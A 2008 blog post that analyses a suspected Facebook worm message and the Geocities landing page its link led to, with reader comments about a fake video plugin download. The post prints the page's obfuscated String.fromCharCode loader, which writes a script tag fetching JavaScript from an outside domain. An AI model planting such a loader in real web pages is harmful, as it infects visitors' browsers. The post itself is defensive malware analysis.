Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse - some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conslusion - I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):


So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse; from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox and NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that 76.x.x.x address there is my IP...


4. I then went and captured the landing page that gave me the above screen shot, the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"}{/script}{script language="JavaScript"} var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/adanbates84/index.htm"; var thSpaceId="76001548"; var thIP="76.243.224.30"; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=76.243.224.30&thTs=1226206771"}{/noscript}{script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"}{script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"}{/script}{script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="http://visit.geocities.yahoo.com/visit.gif?us1226206771" alt="setstats" border="0" width="1" height="1"}{/noscript}

{IMG SRC="http://geo.yahoo.com/serv?s=76001548&t=1226206771&f=us-w90" ALT=1 WIDTH=1 HEIGHT=1}
I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.
{script}document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}


5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="return ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27176/*http://smallbusiness.yahoo.com/domains/" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="return ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}domains.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="return ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27190/*http://smallbusiness.yahoo.com/merchant?p=1" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="return ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}smallbusiness.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, while I'm doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it/credit you).

3 comments:

Anonymous said...

i saw this too almost got nailed by it but firefox wouldn't let me go to it so i went into my linux vm and went to the link and it was some fake youtube site that tried to download a setup.exe 33kbs or so that claimed to be a plugin to watch the movie. will defientnly be more cautious in the future.

Camille said...

I received a message from a Facebook friend about a video that I was in - clicked and it was flagged. It was an "off34-dot-com" link. How does one protect their profile from being hacked in to propagate this worm??

Rafal said...

@camille:
I'm not 100% sure how this happened to your account, so I can't quite tell you how to protect yourself. I *would* immediately change my password if I was you, and in the future be very careful what links you click, and why. Also, something to think about is using FireFox with the NoScript plugin... it's saved me from exploit while doing research more than once :-/

Good luck out there.

Google+